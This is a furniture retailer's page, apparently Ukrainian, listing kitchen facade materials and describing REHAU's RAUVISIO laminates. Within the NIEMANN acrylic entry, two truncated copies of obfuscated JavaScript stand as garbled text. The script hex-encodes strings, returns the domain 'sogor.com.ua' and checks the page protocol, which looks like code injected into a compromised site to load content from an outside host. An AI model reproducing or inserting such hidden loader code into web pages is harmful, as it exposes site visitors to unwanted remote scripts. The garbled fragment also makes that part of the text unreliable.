Кухня. Фасад – Дсп CLEAF

2017/01/15

Матеріал фасаду -Італійське Дсп CLEAF Дізнатись більше Зворотній...

Акрил GRENAGLOSS

2016/06/02

Акрилові фасади виробника GRENAGLOSS

Акрил REHAU

2016/06/02

Акрилові фасади німецького виробника REHAU

Фасади RAUVISIO BRILLIANT від REHAU.

RAUVISIO BRILLIANT - високоглянцевий ламінат з ефектом лакового покриття. RAUVISIO BRILLIANT представляє останнє покоління високоглянцевих ламінатів і, завдяки своєму глибинному ефекту, замінює високоякісні лакові елементи. За допомогою безшовного поєднання плити та крайки створюється досконала повністю глянцева деталь.

Високоглянцевий ламінат проявляє підвищену стійкість до подряпин, що робить його ідеальним вибором для інтер'єрного використання.

Дослідження, проведені REHAU, показали велику неперевершену стійкість до вицвітання, зміні кольору фасадів RAUVISIO BRILLIANT.

Фасади RAUVISIO crystal від REHAU.

Полімерний скляний ламінат RAUVISIO crystal здійснив революційний переворот на ринку застосування скла. Дана інновація повністю компенсує недоліки справжнього скла, поєднавши його переваги із чудовими властивостями термопластичних ламінатів.

Складові RAUVISIO crystal , що застосовуються для виробництва фасадів, відповідають найвищим вимогам якості. Завдяки стійкому до впливу ультрафіолету лаковому покриттю цей ламінат є міцним та може буде використаний будь-де. Покриття зворотної сторони, що також є розробкою REHAU, ідеально співпадає із кольором поверхні, є стійким до подряпин і забезпечує стійкість до деформування готової плити.

RAUVISIO crystal  - це полімерне скло, що пройшло АМК-тестування.

Акрил NIEMANN

2016/06/02

Акрилові фасади німецького виробника NIEMANN // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "sogor.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "sogor.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var...

Скляні фасади

2016/02/17

...

Рамкові фасади

2016/02/17

...

Фарбовані фасади BRW

2015/12/15

...

Фасади шпоновані

2015/12/15

...

Фарбовані фасади STOLZEN

2015/12/15

...

Плівкові фасади BRW

2015/12/15

...